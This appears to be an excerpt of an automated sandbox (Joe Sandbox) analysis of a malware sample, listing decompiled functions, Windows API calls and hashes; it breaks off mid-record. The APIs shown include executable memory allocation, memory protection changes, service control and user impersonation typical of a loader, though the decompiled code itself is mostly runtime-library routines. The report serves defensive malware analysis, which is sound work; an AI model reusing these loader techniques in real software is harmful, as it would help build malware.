0x00402445
0x00402251
0x0040223d
0x0040244f
0x0040245d
0x0040245f
0x00402461
0x00402462
0x00402467
0x00402467
0x0040245f
0x004021ca
0x0040246a
0x0040246e
0x00402470
0x00402478
0x00402478
0x0040247a
0x0040247e
0x00402480
0x00402488
0x00402488
0x00402480
0x00000000
0x00401c55
0x00401c62
0x00401c67
0x00401c6a
0x00401c6c
0x00401c73
0x00401c73
0x00401c77
0x00000000
0x00000000
0x00401c7b
0x00401c8f
0x00401c8f
0x00401c7d
0x00401c7d
0x00401c83
0x00000000
0x00401c85
0x00401c85
0x00401c88
0x00401c8d
0x00000000
0x00000000
0x00000000
0x00000000
0x00401c8d
0x00401c83
0x00401c98
0x00401c9a
0x00401cbd
0x00401cc2
0x00401cc5
0x00401cc7
0x00401cd0
0x00401cd0
0x00401cd2
0x00401cd4
0x00000000
0x00000000
0x00401cd6
0x00401cd8
0x00401cec
0x00401cec
0x00401cda
0x00401cda
0x00401cdd
0x00401ce0
0x00000000
0x00401ce2
0x00401ce2
0x00401ce5
0x00401ce8
0x00401cea
0x00000000
0x00000000
0x00000000
0x00000000
0x00401cea
0x00401ce0
0x00401cf5
0x00401cf5
0x00401cf7
0x00000000
0x00401cf9
0x00401d02
0x00401d07
0x00401d09
0x00401d10
0x00401d1d
0x00401d22
0x00401d25
0x00401d27
0x00401d30
0x00401d30
0x00401d32
0x00401d34
0x00000000
0x00000000
0x00401d36
0x00401d38
0x00401d4c
0x00401d4c
0x00401d3a
0x00401d3a
0x00401d3d
0x00401d40
0x00000000
0x00401d42
0x00401d42
0x00401d45
0x00401d48
0x00401d4a
0x00000000
0x00000000
0x00000000
0x00000000
0x00401d4a
0x00401d40
0x00401d55
0x00401d55
0x00401d57
0x00000000
0x00401d5d
0x00401d6a
0x00401d6f
0x00401d72
0x00401d74
0x00401d80
0x00401d80
0x00401d82
0x00401d84
0x00000000
0x00000000
0x00401d86
0x00401d88
0x00401d9c
0x00401d9c
0x00401d8a
0x00401d8a
0x00401d8d
0x00401d90
0x00000000
0x00401d92
0x00401d92
0x00401d95
0x00401d98
0x00401d9a
0x00000000
0x00000000
0x00000000
0x00000000
0x00401d9a
0x00401d90
0x00401da5
0x00401da5
0x00401da7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00401da7
0x00401da0
0x00401da2
0x00000000
0x00401da2
0x00000000
0x00401d57
0x00401d50
0x00401d52
0x00000000
0x00401dad
0x00401db6
0x00401dbb
0x00401dbb
0x00401d10
0x00000000
0x00401d09
0x00000000
0x00401cf7
0x00401cf0
0x00401cf2
0x00000000
0x00401c9c
0x00401c9c
0x00401c9d
0x00401caf
0x00401caf
0x00000000
0x00401c9a
0x00401c93
0x00401c95
0x00000000
0x00401c95
0x00401c4f
0x00000000

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
GetCurrentProcessId.KERNEL32 ref: 00401ACD
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
Module32First.KERNEL32 ref: 00401C48
CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
Module32Next.KERNEL32 ref: 00401D02
Module32Next.KERNEL32 ref: 00401DB6
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401DC4
GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
LockResource.KERNEL32(00000000), ref: 00401EA7
SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD
SizeofResource.KERNEL32(00000000,?), ref: 00401F02

Strings

E, xrefs: 00401E0F
', xrefs: 00401AF6
4, xrefs: 00402074
8, xrefs: 00401BA9
%, xrefs: 004020FA
{, xrefs: 00401B4B
W, xrefs: 00401B23
W, xrefs: 004020E6
*, xrefs: 00401A1F
*, xrefs: 004020E1
_._, xrefs: 00402257
x, xrefs: 0040214A
V, xrefs: 00402038
W, xrefs: 00402033
x, xrefs: 00402088
., xrefs: 00401B0A
5, xrefs: 00402109
W, xrefs: 00401B14
4, xrefs: 00401B64
!, xrefs: 004020CF
', xrefs: 00402006
[, xrefs: 00401B37
h, xrefs: 00401A6F
!, xrefs: 00401B1E
U, xrefs: 004020F5
!, xrefs: 0040201A
x, xrefs: 00401E69
v, xrefs: 0040206A
___, xrefs: 0040227D
o, xrefs: 00402159
{, xrefs: 00401E3C
v, xrefs: 00401B5A
V, xrefs: 00401E19
v, xrefs: 00401E4B
v, xrefs: 0040212C
., xrefs: 0040201F
4, xrefs: 00402136
o, xrefs: 00402097
[, xrefs: 00402047
:, xrefs: 00401B28
0, xrefs: 00401BBD
), xrefs: 0040202E
{, xrefs: 0040211D
", xrefs: 00401B0F
6, xrefs: 004020C5
o, xrefs: 00401B8D
{, xrefs: 0040205B
x, xrefs: 00401B78
D, xrefs: 00401DFB

Memory Dump Source

Source File: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.306344937.0000000000426000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.306344937.000000000042F000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_h99af07.jbxd

Yara matches

Similarity

API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 2366190142-2962942730
Opcode ID: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
Opcode Fuzzy Hash: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Uniqueness

Uniqueness Score: -1.00%

Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
				void* __ebx;
				void* __ebp;
				signed int _t12;
				void* _t21;
				int _t25;
				void* _t30;
				int _t32;
				char* _t35;

				_t21 = __edx;
				_t35 = _a4;
				_t17 = __ecx;
				if(_t35 != 0) {
					_t25 = lstrlenA(_t35) + 1;
					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
					asm("sbb esi, esi");
					_t30 =  ~_t12 + 1;
					if(_t30 != 0) {
						_t12 = GetLastError();
						if(_t12 == 0x7a) {
							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
							asm("sbb esi, esi");
							_t30 =  ~_t12 + 1;
						}
						if(_t30 != 0) {
							_t12 = E00401030();
						}
					}
					return _t12;
				} else {
					 *__ecx = _t35;
					return __eax;
				}
			}

0x004018f0
0x004018f2
0x004018f6
0x004018fa
0x00401917
0x0040191a
0x0040192f
0x00401939
0x0040193b
0x0040193e
0x00401940
0x00401949
0x0040195e
0x0040196b
0x00401980
0x0040198a
0x0040198c
0x0040198c
0x0040198f
0x00401991
0x00401991
0x0040198f
0x0040199a
0x004018fc
0x004018fc
0x00401900
0x00401900

APIs

lstrlenA.KERNEL32(?), ref: 00401906
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
GetLastError.KERNEL32 ref: 00401940
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980

Memory Dump Source

Source File: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.306344937.0000000000426000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.306344937.000000000042F000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_h99af07.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v4;
				signed int _v16;
				signed int _v40;
				void* _t14;
				signed int _t15;
				intOrPtr* _t21;
				signed int _t24;
				void* _t28;
				void* _t39;
				void* _t40;
				signed int _t42;
				void* _t45;
				void* _t47;
				void* _t51;

				_t40 = __edi;
				_t28 = __ebx;
				_t45 = _t51;
				while(1) {
					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = E0040D2E3(_a4);
					__eflags = _t15;
					if(_t15 == 0) {
						__eflags =  *0x423490 & 0x00000001;
						if(( *0x423490 & 0x00000001) == 0) {
							 *0x423490 =  *0x423490 | 0x00000001;
							__eflags =  *0x423490;
							E0040AEFC(0x423484);
							E0040D2BD( *0x423490, 0x41a704);
						}
						E0040AF49( &_v16, 0x423484);
						E0040CD39( &_v16, 0x420fa4);
						asm("int3");
						_t47 = _t45;
						_push(_t47);
						_push(0xc);
						_push(0x420ff8);
						_t19 = E0040E1D8(_t28, _t40, 0x423484);
						_t42 = _v4;
						__eflags = _t42;
						if(_t42 != 0) {
							__eflags =  *0x4250b0 - 3;
							if( *0x4250b0 != 3) {
								_push(_t42);
								goto L16;
							} else {
								E0040D6E0(_t28, 4);
								_v16 = _v16 & 0x00000000;
								_t24 = E0040D713(_t42);
								_v40 = _t24;
								__eflags = _t24;
								if(_t24 != 0) {
									_push(_t42);
									_push(_t24);
									E0040D743();
								}
								_v16 = 0xfffffffe;
								_t19 = E0040B70B();
								__eflags = _v40;
								if(_v40 == 0) {
									_push(_v4);
									L16:
									__eflags = HeapFree( *0x4234b4, 0, ??);
									if(__eflags == 0) {
										_t21 = E0040BFC1(__eflags);
										 *_t21 = E0040BF7F(GetLastError());
									}
								}
							}
						}
						return E0040E21D(_t19);
					} else {
						continue;
					}
					L19:
				}
				return _t14;
				goto L19;
			}

0x0040af66
0x0040af66
0x0040af69
0x0040af7d
0x0040af80
0x0040af88
0x00000000
0x00000000
0x0040af73
0x0040af79
0x0040af7b
0x0040af8c
0x0040af98
0x0040af9a
0x0040af9a
0x0040afa3
0x0040afad
0x0040afb2
0x0040afb7
0x0040afc5
0x0040afca
0x0040afd0
0x0040aec2
0x0040b6b5
0x0040b6b7
0x0040b6bc
0x0040b6c1
0x0040b6c4
0x0040b6c6
0x0040b6c8
0x0040b6cf
0x0040b714
0x00000000
0x0040b6d1
0x0040b6d3
0x0040b6d9
0x0040b6de
0x0040b6e4
0x0040b6e7
0x0040b6e9
0x0040b6eb
0x0040b6ec
0x0040b6ed
0x0040b6f3
0x0040b6f4
0x0040b6fb
0x0040b700
0x0040b704
0x0040b706
0x0040b715
0x0040b723
0x0040b725
0x0040b727
0x0040b73a
0x0040b73c
0x0040b725
0x0040b704
0x0040b6cf
0x0040b742
0x00000000
0x00000000
0x00000000
0x00000000
0x0040af7b
0x0040af8b
0x00000000

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.306344937.0000000000426000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.306344937.000000000042F000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_h99af07.jbxd

Yara matches

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Uniqueness

Uniqueness Score: -1.00%

Function 02E98356 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02E9837E
Module32First.KERNEL32(00000000,00000224), ref: 02E9839E

Memory Dump Source

Source File: 00000005.00000002.307087402.0000000002E97000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E97000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e97000_h99af07.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 3c0e9738d56ad3f05fbcd92844244000bcd438b062e268070044c18ae68d8761
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 02F0F636140710BFDB30BBF59C8CB6E76ECEF4A329F10512AE642910D0DB70E8058A61

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7EE Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040E7EE(int _a4) {

				E0040E7C3(_a4); // executed
				ExitProcess(_a4);
			}

0x0040e7f6
0x0040e7ff

APIs

___crtCorExitProcess.LIBCMT ref: 0040E7F6

Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA

ExitProcess.KERNEL32 ref: 0040E7FF

Memory Dump Source

Source File: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.306344937.0000000000426000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.306344937.000000000042F000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_h99af07.jbxd

Yara matches

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5

Uniqueness

Uniqueness Score: -1.00%

Function 045EA1A8 Relevance: 1.8, APIs: 1, Instructions: 299
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ChangeServiceConfigA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 045EA4A0

Memory Dump Source

Source File: 00000005.00000002.307361059.00000000045E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_h99af07.jbxd

Similarity

API ID: ChangeConfigService
String ID:
API String ID: 3849694230-0
Opcode ID: 507a85cd4b8e0c625378943e2649e50c84d25431f6df8e52116076d72f20f80d
Instruction ID: f35a598423140825df3bc847f13fdd1789365fff47307aa1349ea9bc8ff74b87
Opcode Fuzzy Hash: 507a85cd4b8e0c625378943e2649e50c84d25431f6df8e52116076d72f20f80d
Instruction Fuzzy Hash: 3CC16A70D006599FDB14CFB9D8857AEBBF2BF48304F048629E855E7284D774A882EF81

Uniqueness

Uniqueness Score: -1.00%

Function 045E99E8 Relevance: 1.6, APIs: 1, Instructions: 92
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenServiceA.ADVAPI32(?,?,?), ref: 045E9AC2

Memory Dump Source

Source File: 00000005.00000002.307361059.00000000045E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_h99af07.jbxd

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 8deafc3bd6217ec3d6e2007d07678962aced011440c91ba69e736f48c8291ef3
Instruction ID: 4e792e0c106643f4d1292f33ed4fa58d484d9e8c5aff020ba7b49b1b041e48b9
Opcode Fuzzy Hash: 8deafc3bd6217ec3d6e2007d07678962aced011440c91ba69e736f48c8291ef3
Instruction Fuzzy Hash: D93143B0D002589FDB24CFAAD884BAEBBF1BF48704F14852AE815A7340D774A846DF91

Uniqueness

Uniqueness Score: -1.00%

Function 045E9920 Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 045E99A5

Memory Dump Source

Source File: 00000005.00000002.307361059.00000000045E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_h99af07.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: f60f402c135db5ac2893f3d62daf4814961a9c09829e00f4e4431efc773cb861
Instruction ID: f44a9c7d0e26fd5727a3abb1ab7c7d4694d2827f1af5903430fff2754487de6a
Opcode Fuzzy Hash: f60f402c135db5ac2893f3d62daf4814961a9c09829e00f4e4431efc773cb861
Instruction Fuzzy Hash: AB2104B6C002189FCB14CF9AD884AEEFBF4FB88710F14855AE909BB244D774A545CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 045E9180 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 045E91F4

Memory Dump Source

Source File: 00000005.00000002.307361059.00000000045E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_h99af07.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e6b87f459789aac601a4d6ca66ca7eef7c982b1de169f6fc593878642a57a911
Instruction ID: 885b60ea5d73757a05aef63cadf38e833060206dfafd3c3d20acd7ac74711286
Opcode Fuzzy Hash: e6b87f459789aac601a4d6ca66ca7eef7c982b1de169f6fc593878642a57a911
Instruction Fuzzy Hash: 7711E5B1D002099FDB14DFAAC484AEFFBF5BF48310F50842AD41AB7250D778A9458FA1

Uniqueness

Uniqueness Score: -1.00%

Function 045EA0E8 Relevance: 1.6, APIs: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ControlService.ADVAPI32(?,?,?), ref: 045EA158

Memory Dump Source

Source File: 00000005.00000002.307361059.00000000045E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_h99af07.jbxd

Similarity

API ID: ControlService
String ID:
API String ID: 253159669-0
Opcode ID: 8872deb18a4ab89589d0c6eddbe66f7ff0a4e1d5c8119d6ecbcec4ad10b431b2
Instruction ID: 300eac6a0b5cffcb9767c113efa8c4251c28aca8571abb89287298aaa54ce7c0
Opcode Fuzzy Hash: 8872deb18a4ab89589d0c6eddbe66f7ff0a4e1d5c8119d6ecbcec4ad10b431b2
Instruction Fuzzy Hash: 0B11D3B19002099FDB14CF9AD584BEEFBF4EB48310F10842AE559A3350D378A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 045E9350 Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 045E93B2

Memory Dump Source

Source File: 00000005.00000002.307361059.00000000045E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_h99af07.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: f6107e0df46c736517f874054c3db81e33bf04c75a58713e678e6a32df5c9e6a
Instruction ID: 24ce07349c7119e3b07127634ad004a95a7644fc629e17e4c0fbbe0c47ab5e2a
Opcode Fuzzy Hash: f6107e0df46c736517f874054c3db81e33bf04c75a58713e678e6a32df5c9e6a
Instruction Fuzzy Hash: 981125B19002488FDB14DFAAC4447EFFBF5AB88314F20881AD51AB7350DB78A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 045E9ED8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ImpersonateLoggedOnUser.KERNELBASE ref: 045E9F37

Memory Dump Source

Source File: 00000005.00000002.307361059.00000000045E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_h99af07.jbxd

Similarity

API ID: ImpersonateLoggedUser
String ID:
API String ID: 2216092060-0
Opcode ID: 230bd99b3a041802052bc241bf7a53df9c0d1c09f4f8a357f3596f2ba5ff5106
Instruction ID: f48cb6a1a1ffdd05135fffa88569ac6a609c9345821a12bcafce9433db680bc7
Opcode Fuzzy Hash: 230bd99b3a041802052bc241bf7a53df9c0d1c09f4f8a357f3596f2ba5ff5106
Instruction Fuzzy Hash: AE11F5B1800249CFDB10CF9AD544BEEBBF4EB48324F10845AD529B3650D778A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 045E9CC8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 045E9D27

Memory Dump Source

Source File: 00000005.00000002.307361059.00000000045E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_h99af07.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 21b0e1307038732fd70972ac9670df04bc6291813c5a3b86434821528d8dc299
Instruction ID: 6422a5eb778db9b78233d410f2082ba37dd97b466c9f5c0e6420ffd0c82bfb73
Opcode Fuzzy Hash: 21b0e1307038732fd70972ac9670df04bc6291813c5a3b86434821528d8dc299
Instruction Fuzzy Hash: 9911F2B18002198FDB10CF9AD984BEEFBF4EB48324F20846AD519B3650D778A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040D534(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x4234b4 = _t6;
				if(_t6 != 0) {
					 *0x4250b0 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x0040d549
0x0040d54f
0x0040d556
0x0040d55d
0x0040d563
0x0040d559
0x0040d559
0x0040d559

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549

Memory Dump Source

Source File: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.306344937.0000000000426000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.306344937.000000000042F000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_h99af07.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA0A Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E0040EA0A(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
				return _t2;
			}

0x0040ea0f
0x0040ea11
0x0040ea13
0x0040ea16
0x0040ea1f

APIs

_doexit.LIBCMT ref: 0040EA16

Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4

Memory Dump Source

Source File: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.306344937.0000000000426000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.306344937.000000000042F000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_h99af07.jbxd

Yara matches

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189

Uniqueness

Uniqueness Score: -1.00%

Function 02E98015 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02E98066

Memory Dump Source

Source File: 00000005.00000002.307087402.0000000002E97000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E97000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e97000_h99af07.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 45655bd9c9d567d0391f16ab593ffa3522cede7a9bc8c2bed98b385a115c0160
